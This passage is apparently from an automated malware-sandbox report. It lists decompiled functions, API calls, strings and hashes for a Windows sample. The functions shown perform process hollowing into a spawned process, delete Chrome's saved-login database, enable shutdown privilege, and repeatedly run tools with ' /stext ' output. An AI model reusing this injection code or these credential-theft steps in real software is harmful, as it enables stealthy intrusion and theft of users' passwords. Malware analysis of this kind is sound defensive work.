                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F219, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040F219() {
				void* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
									goto L16;
								} else {
									_t74 = 0;
									 *(_t115 - 0x64) = 0;
									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
										_t100 =  *(_t115 + 0xc);
										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
										_t74 =  *(_t115 - 0x64);
									}
									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
										goto L16;
									} else {
										_t80 =  *(_t115 - 0x70);
										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
											goto L16;
										} else {
											_t60 = 1;
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

















                                  0x0040f21e
                                  0x0040f229
                                  0x0040f22c
                                  0x0040f247
                                  0x0040f24a
                                  0x0040f24d
                                  0x0040f255
                                  0x0040f3c7
                                  0x0040f3c7
                                  0x0040f3cb
                                  0x0040f25b
                                  0x0040f25e
                                  0x0040f260
                                  0x0040f269
                                  0x00000000
                                  0x0040f26f
                                  0x0040f271
                                  0x0040f277
                                  0x0040f279
                                  0x0040f27e
                                  0x0040f27f
                                  0x0040f280
                                  0x0040f281
                                  0x0040f29c
                                  0x00000000
                                  0x0040f2a2
                                  0x0040f2b2
                                  0x0040f2b4
                                  0x0040f2b7
                                  0x0040f2c9
                                  0x00000000
                                  0x0040f2f1
                                  0x0040f2f1
                                  0x0040f2f7
                                  0x0040f2fc
                                  0x0040f2fc
                                  0x0040f30e
                                  0x0040f314
                                  0x0040f319
                                  0x00000000
                                  0x0040f33a
                                  0x0040f33a
                                  0x0040f33c
                                  0x0040f33f
                                  0x0040f34a
                                  0x0040f353
                                  0x0040f35a
                                  0x0040f371
                                  0x0040f373
                                  0x0040f376
                                  0x0040f376
                                  0x0040f396
                                  0x00000000
                                  0x0040f398
                                  0x0040f39e
                                  0x0040f3a1
                                  0x0040f3b3
                                  0x00000000
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3b3
                                  0x0040f396
                                  0x0040f319
                                  0x0040f2c9
                                  0x0040f29c
                                  0x0040f269
                                  0x0040f3d0
                                  0x0040f3db

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x00407124
                                  0x0040712f
                                  0x00407136
                                  0x0040713a
                                  0x00407145
                                  0x0040714e
                                  0x0040715d
                                  0x004071b1
                                  0x004071b7
                                  0x004071bf
                                  0x004071c1
                                  0x004071c4
                                  0x00000000
                                  0x004071ca
                                  0x00407166
                                  0x00407167
                                  0x0040719c
                                  0x00407178
                                  0x0040717e
                                  0x00407184
                                  0x0040718f
                                  0x00000000
                                  0x00407195
                                  0x0040716a
                                  0x00407173
                                  0x00000000
                                  0x00407176
                                  0x0040716c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • UserProfile, xrefs: 0040711F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                  0x0040ec23
                                  0x0040ec35
                                  0x0040ec46
                                  0x0040ec4d
                                  0x0040ec54
                                  0x0040ec5a
                                  0x0040ec62
                                  0x0040ec68

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AE6A, Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
